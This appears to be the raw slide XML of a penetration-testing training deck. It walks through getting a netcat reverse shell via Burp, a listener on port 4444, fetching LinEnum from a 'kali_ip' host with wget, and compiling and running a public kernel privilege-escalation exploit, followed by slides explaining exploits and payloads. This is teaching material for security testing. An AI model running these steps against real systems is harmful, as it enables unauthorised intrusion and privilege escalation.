              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> reverse shell , to do this – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intercept the traffic with burp </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> reverse shell script and encode with burp suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> listener on kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  (# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nvlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And from Burp suite send the request and get a shell </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then upgrade to fully interactive shell </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse shell reference - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upgrade </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/full-ttys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3507183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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Privilege Escalation &amp; File Transfer</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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295400" y="1576988"/>
            <a:ext cx="10281082" cy="4983609"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As we got the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> based reverse shell, so there is no automated privilege escalation is available. We have to enumerate and exploit manually. To do this, we need to transfer enumeration tool like – LinEnum.sh, linux-exploit-suggester.sh, Linpeas.sh etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For this demo, I have transferred LinEnum.sh script for enumeration locally to escalate the privilege. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To share file, you need run python http server on your kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>python –m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D52DAB1-B40C-5E15-1C10-A78A7010E322}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="4652424"/>
            <a:ext cx="7164244" cy="842853"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3072044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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Privilege Escalation &amp; File Transfer</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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295400" y="1576988"/>
            <a:ext cx="10281082" cy="4983609"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then from target system, you need to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> download command to download the file from kali server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://kali_ip:port/LinEnum.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And then run it </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t># ./LinEnum.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Linuenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> we have found that the kernel version is vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7302C1D5-26CB-B6E8-294F-AA54E7B3E95E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485635" y="4643876"/>
            <a:ext cx="5860970" cy="1347349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121193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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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295400" y="1576988"/>
            <a:ext cx="10281082" cy="4983609"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then, collect the exploit from exploit databases. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ref - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.exploit-db.com/exploits/37292</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then transfer the file to the target system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As this is a c language based, to run this exploit we need to compile this file. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>exploit.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> –o exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And then run it </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t># ./exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A4B19C-CB62-5725-C984-7747FF2F7903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="5483945"/>
            <a:ext cx="5095697" cy="952365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="536053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7C67-6CF9-67F1-914D-F809B1FE245C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1875183" y="3057939"/>
            <a:ext cx="9601200" cy="1485900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Thank you</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202744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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Vulnerability Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Vulnerability exploitation is a process that involves the execution of multiple process complex, interrelated steps to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>gain access to a remote system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>. These steps includes following steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Identify the vulnerability </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Determine the risk associated with the vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Determine the capability of the vulnerability </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Exploit development (Adv. Level) / Exploit Modification (Mid level) / Exploit selection (Script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>kiddy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Payload selection / Payload Generate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Gain the access </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170191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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Exploit &amp; Payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploits and payloads work together to compromise a system, but they are not the same thing. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is the mechanism that delivers the payload. It is a sequence of commands that takes advantage of a vulnerability. Typical exploit types include: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web application exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once you have broken into a system using an exploit, you can then deliver the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. This is code that will run on the target, performing some kind of task or giving the attacker interactive control. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1282935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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Exploit Source &amp; Usage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit development is very advanced hacking skill and time consuming. As a beginner or intermediate tester, you can find exploit in public sources. Some of are-      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.exploit-db.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://packetstormsecurity.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.rapid7.com/db/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most exploits are available in python or C language. C language exploits are required for compilation. Compilation needs to correct way for success. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347332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r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Paylaod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and Shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payloads can either perform tasks on their own with no additional direction, or they can wait for commands from the attacker. They can either open a listening port and wait for an attacker to connect, or they can make a connection back to the attacker. This is especially useful when the victim is behind a firewall which the attacker cannot get past.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
